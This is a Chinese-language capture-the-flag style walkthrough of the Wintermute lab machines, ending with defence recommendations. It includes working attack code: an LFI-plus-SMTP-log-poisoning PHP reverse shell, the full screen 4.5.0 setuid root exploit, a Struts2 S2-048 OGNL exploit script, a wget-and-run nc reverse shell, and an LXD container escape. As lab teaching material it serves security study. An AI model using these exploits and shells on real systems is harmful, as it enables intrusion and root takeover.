Wintermute靶机渗透测试教学文档<\/h1>

靶机概述<\/h2>
Wintermute靶机包含两个系统：<\/p>
192.168.8.103 (straylight) - 初始目标<\/li>
192.168.28.4 (neuromancer) - 横向移动目标<\/li> <\/ol>
第一阶段：信息收集<\/h2>

初始扫描<\/h3>
nmap 192.168.8.103 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

25\/tcp - SMTP (Postfix)<\/li>
80\/tcp - HTTP (Apache 2.4.25)<\/li>
3000\/tcp - ntopng服务<\/li>
<\/ul>
ntopng服务<\/h3>

默认凭证：admin\/admin<\/li>
发现80端口存在\/turing-bolo目录<\/li>
<\/ul>
第二阶段：漏洞利用<\/h2>
1. LFI漏洞利用<\/h3>
在\/turing-bolo目录发现bolo.php存在本地文件包含漏洞：<\/p>
http:\/\/192.168.8.103\/\/turing-bolo\/bolo.php?bolo=molly.log
<\/code><\/pre>
通过删除.log后缀可触发漏洞：<\/p>
http:\/\/192.168.8.103\/\/turing-bolo\/bolo.php?bolo=molly
<\/code><\/pre>
利用SMTP日志文件进行LFI：<\/p>
http:\/\/192.168.8.103\/\/turing-bolo\/bolo.php?bolo=\/var\/log\/mail
<\/code><\/pre>
2. 通过SMTP日志注入获取RCE<\/h3>
步骤：<\/p>

连接SMTP服务：<\/li>
<\/ol>
nc -nC 192.168.8.103 25<\/span>
<\/span><\/span><\/code><\/pre>

注入PHP代码到日志中<\/p>
<\/li>

通过LFI执行代码获取反向shell：<\/p>
<\/li>
<\/ol>
http:\/\/192.168.8.103\/\/turing-bolo\/bolo.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.8.107%22%2C10032%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&bolo=\/var\/log\/mail
<\/code><\/pre>
监听端口：<\/p>
nc -lvnp 10032<\/span>
<\/span><\/span><\/code><\/pre>3. 权限提升（Screen 4.5.0漏洞）<\/h3>
查找SUID文件：<\/p>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现screen存在漏洞，使用以下脚本提权：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span># screenroot.sh<\/span>
<\/span><\/span># setuid screen v4.5.0 local root exploit<\/span>
<\/span><\/span># abuses ld.so.preload overwriting to get root.<\/span>
<\/span><\/span>
<\/span><\/span>echo "~ gnu\/screenroot ~"<\/span>
<\/span><\/span>echo "[+] First, we create our shell and library..."<\/span>
<\/span><\/span>
<\/span><\/span>cat << EOF > \/tmp\/libhax.c
<\/span><\/span><\/span>#include <stdio.h>
<\/span><\/span><\/span>#include <sys\/types.h>
<\/span><\/span><\/span>#include <unistd.h>
<\/span><\/span><\/span>__attribute__ ((__constructor__))
<\/span><\/span><\/span>void dropshell(void){
<\/span><\/span><\/span>    chown("\/tmp\/rootshell", 0, 0);
<\/span><\/span><\/span>    chmod("\/tmp\/rootshell", 04755);
<\/span><\/span><\/span>    unlink("\/etc\/ld.so.preload");
<\/span><\/span><\/span>    printf("[+] done!\n");
<\/span><\/span><\/span>}
<\/span><\/span><\/span>EOF<\/span>
<\/span><\/span>
<\/span><\/span>gcc -fPIC -shared -ldl -o \/tmp\/libhax.so \/tmp\/libhax.c
<\/span><\/span>rm -f \/tmp\/libhax.c
<\/span><\/span>
<\/span><\/span>cat << EOF > \/tmp\/rootshell.c
<\/span><\/span><\/span>#include <stdio.h>
<\/span><\/span><\/span>int main(void){
<\/span><\/span><\/span>    setuid(0);
<\/span><\/span><\/span>    setgid(0);
<\/span><\/span><\/span>    seteuid(0);
<\/span><\/span><\/span>    setegid(0);
<\/span><\/span><\/span>    execvp("\/bin\/sh", NULL, NULL);
<\/span><\/span><\/span>}
<\/span><\/span><\/span>EOF<\/span>
<\/span><\/span>
<\/span><\/span>gcc -o \/tmp\/rootshell \/tmp\/rootshell.c
<\/span><\/span>rm -f \/tmp\/rootshell.c
<\/span><\/span>
<\/span><\/span>echo "[+] Now we create our \/etc\/ld.so.preload file..."<\/span>
<\/span><\/span>cd \/etc
<\/span><\/span>umask 000<\/span> # because<\/span>
<\/span><\/span>screen -D -m -L ld.so.preload echo -ne "\x0a\/tmp\/libhax.so"<\/span> # newline needed<\/span>
<\/span><\/span>echo "[+] Triggering..."<\/span>
<\/span><\/span>screen -ls # screen itself is setuid, so...<\/span>
<\/span><\/span>\/tmp\/rootshell
<\/span><\/span><\/code><\/pre>执行步骤：<\/p>
cd \/tmp
<\/span><\/span>wget http:\/\/192.168.8.107\/root.sh
<\/span><\/span>chmod +x root.sh
<\/span><\/span>.\/root.sh
<\/span><\/span><\/code><\/pre>第三阶段：横向移动<\/h2>
1. 发现内网主机<\/h3>
在192.168.8.103上发现note.txt，提到：<\/p>

存在192.168.28.4主机<\/li>
部署了struts2_2.3.15.1-showcase应用<\/li>
<\/ul>
2. 建立隧道<\/h3>
使用chisel建立SOCKS5隧道：<\/p>
服务端(Kali):<\/p>
.\/chisel server -p 2333<\/span> --socks5
<\/span><\/span><\/code><\/pre>客户端(靶机):<\/p>
.\/chisel client 192.168.8.103:2333 socks
<\/span><\/span><\/code><\/pre>配置proxychains:<\/p>
proxychains -f .\/internal.conf
<\/span><\/span><\/code><\/pre>3. 扫描内网主机<\/h3>
proxychains -f .\/internal.conf nmap 192.168.28.4 --min-rate 1000<\/span> -Pn
<\/span><\/span>proxychains -f .\/internal.conf nmap -p 8009,8080 192.168.28.4 -Pn -sC -sV
<\/span><\/span><\/code><\/pre>发现8080端口运行Tomcat和Struts2应用<\/p>
4. Struts2 S2-048漏洞利用<\/h3>
使用以下Python脚本进行利用：<\/p>
#!\/usr\/bin\/python<\/span>
<\/span><\/span># -*- coding: utf-8 -*-<\/span>
<\/span><\/span># Just a demo for CVE-2017-9791<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>def<\/span> exploit<\/span>(url, cmd):
<\/span><\/span>    print("[+] command: <\/span>%s<\/span>"<\/span> %<\/span> cmd)
<\/span><\/span>    payload =<\/span> "%{"<\/span>
<\/span><\/span>    payload +=<\/span> "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."<\/span>
<\/span><\/span>    payload +=<\/span> "(#_memberAccess?(#_memberAccess=#dm):"<\/span>
<\/span><\/span>    payload +=<\/span> "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."<\/span>
<\/span><\/span>    payload +=<\/span> "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."<\/span>
<\/span><\/span>    payload +=<\/span> "(#ognlUtil.getExcludedPackageNames().clear())."<\/span>
<\/span><\/span>    payload +=<\/span> "(#ognlUtil.getExcludedClasses().clear())."<\/span>
<\/span><\/span>    payload +=<\/span> "(#context.setMemberAccess(#dm))))."<\/span>
<\/span><\/span>    payload +=<\/span> "(@java.lang.Runtime@getRuntime().exec('<\/span>%s<\/span>'))"<\/span> %<\/span> cmd
<\/span><\/span>    payload +=<\/span> "}"<\/span>
<\/span><\/span>    
<\/span><\/span>    data =<\/span> {
<\/span><\/span>        "name"<\/span>: payload,
<\/span><\/span>        "age"<\/span>: 20<\/span>,
<\/span><\/span>        "__checkbox_bustedBefore"<\/span>: "true"<\/span>,
<\/span><\/span>        "description"<\/span>: 1<\/span>
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    headers =<\/span> {
<\/span><\/span>        'Referer'<\/span>: 'http:\/\/127.0.0.1:8080\/2.3.15.1-showcase\/integration\/editGangster'<\/span>
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    requests.<\/span>post(url, data=<\/span>data, headers=<\/span>headers)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    import<\/span> sys
<\/span><\/span>    if<\/span> len(sys.<\/span>argv) !=<\/span> 3<\/span>:
<\/span><\/span>        print("python <\/span>%s<\/span> <url> <cmd>"<\/span> %<\/span> sys.<\/span>argv[0<\/span>])
<\/span><\/span>        sys.<\/span>exit(0<\/span>)
<\/span><\/span>    
<\/span><\/span>    print('[*] exploit Apache Struts2 S2-048'<\/span>)
<\/span><\/span>    url =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>    cmd =<\/span> sys.<\/span>argv[2<\/span>]
<\/span><\/span>    exploit(url, cmd)
<\/span><\/span><\/code><\/pre>执行步骤：<\/p>

在Kali上设置socat端口转发：<\/li>
<\/ol>
socat TCP-LISTEN:10034,fork,reuseaddr TCP:192.168.8.107:10034 &
<\/span><\/span><\/code><\/pre>
准备反弹shell脚本(re.sh):<\/li>
<\/ol>
rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/bash -i 2>&1|nc 192.168.28.3 10034<\/span> >\/tmp\/f
<\/span><\/span><\/code><\/pre>
在Kali上启动HTTP服务：<\/li>
<\/ol>
python3 -m http.server 10034<\/span>
<\/span><\/span><\/code><\/pre>
分步执行攻击：<\/li>
<\/ol>
proxychains -f internal.conf python3 exp.py http:\/\/192.168.28.4:8080\/struts2_2.3.15.1-showcase\/integration\/saveGangster.action "wget http:\/\/192.168.28.3:10034\/re.sh -O \/tmp\/re.sh"<\/span>
<\/span><\/span>
<\/span><\/span>proxychains -f internal.conf python3 exp.py http:\/\/192.168.28.4:8080\/struts2_2.3.15.1-showcase\/integration\/saveGangster.action "chmod +x \/tmp\/re.sh"<\/span>
<\/span><\/span>
<\/span><\/span>proxychains -f internal.conf python3 exp.py http:\/\/192.168.28.4:8080\/struts2_2.3.15.1-showcase\/integration\/saveGangster.action "sh \/tmp\/re.sh"<\/span>
<\/span><\/span><\/code><\/pre>
监听端口：<\/li>
<\/ol>
nc -lvnp 10034<\/span>
<\/span><\/span><\/code><\/pre>第四阶段：权限提升(LXC逃逸)<\/h2>
1. 建立SSH连接<\/h3>
发现ta用户可以写入\/home目录：<\/p>
for<\/span> dir in \/home\/*\/; do<\/span> touch "<\/span>$dir\/1.txt"<\/span>; done<\/span>
<\/span><\/span><\/code><\/pre>生成SSH密钥：<\/p>
ssh-keygen
<\/span><\/span>cat \/home\/ta\/.ssh\/id_rsa.pub > authorized_keys
<\/span><\/span><\/code><\/pre>从Kali连接：<\/p>
proxychains -f internal.conf ssh -i id_rsa ta@192.168.28.4 -p 34483<\/span>
<\/span><\/span><\/code><\/pre>2. LXD提权<\/h3>
发现ta用户在lxd组，使用以下步骤提权：<\/p>

在Kali上构建Alpine镜像：<\/li>
<\/ol>
git clone https:\/\/github.com\/saghul\/lxd-alpine-builder.git
<\/span><\/span>cd lxd-alpine-builder
<\/span><\/span>sudo .\/build-alpine
<\/span><\/span><\/code><\/pre>
设置文件传输：<\/li>
<\/ol>
socat TCP-LISTEN:10035,fork,reuseaddr TCP:192.168.8.107:10035 &
<\/span><\/span>python3 -m http.server 10035<\/span>
<\/span><\/span><\/code><\/pre>
在靶机上下载并导入镜像：<\/li>
<\/ol>
wget http:\/\/192.168.28.3:10035\/alpine-v3.20-x86_64-20240613_1112.tar.gz -O \/tmp\/alpine.tar.gz
<\/span><\/span>lxc image import \/tmp\/alpine.tar.gz --alias test
<\/span><\/span><\/code><\/pre>
创建特权容器：<\/li>
<\/ol>
lxc init test ignite -c security.privileged=<\/span>true
<\/span><\/span>lxc config device add ignite test disk source=<\/span>\/ path=<\/span>\/mnt\/root recursive=<\/span>true
<\/span><\/span>lxc start ignite
<\/span><\/span>lxc exec ignite \/bin\/sh
<\/span><\/span><\/code><\/pre>
现在可以访问宿主机的完整文件系统在\/mnt\/root下<\/li>
<\/ol>
关键知识点总结<\/h2>


LFI漏洞利用<\/strong>：<\/p>

通过文件包含读取系统日志<\/li>
利用服务日志注入恶意代码<\/li>
<\/ul>
<\/li>

Screen提权<\/strong>：<\/p>

利用ld.so.preload机制<\/li>
通过SUID二进制文件获取root权限<\/li>
<\/ul>
<\/li>

横向移动技术<\/strong>：<\/p>

使用chisel建立隧道<\/li>
通过proxychains进行内网扫描<\/li>
<\/ul>
<\/li>

Struts2漏洞利用<\/strong>：<\/p>

S2-048远程代码执行<\/li>
通过OGNL表达式注入<\/li>
<\/ul>
<\/li>

LXC容器逃逸<\/strong>：<\/p>

利用lxd组权限<\/li>
创建特权容器挂载宿主机文件系统<\/li>
<\/ul>
<\/li>

稳定访问技术<\/strong>：<\/p>

SSH密钥部署<\/li>
通过socat建立稳定通道<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

及时更新易受攻击的软件版本<\/li>
限制日志文件的写入权限<\/li>
避免使用默认凭证<\/li>
限制SUID二进制文件<\/li>
实施网络隔离，防止横向移动<\/li>
定期审计用户组权限，特别是lxd\/docker组<\/li>
对Web应用输入进行严格过滤<\/li>
<\/ol>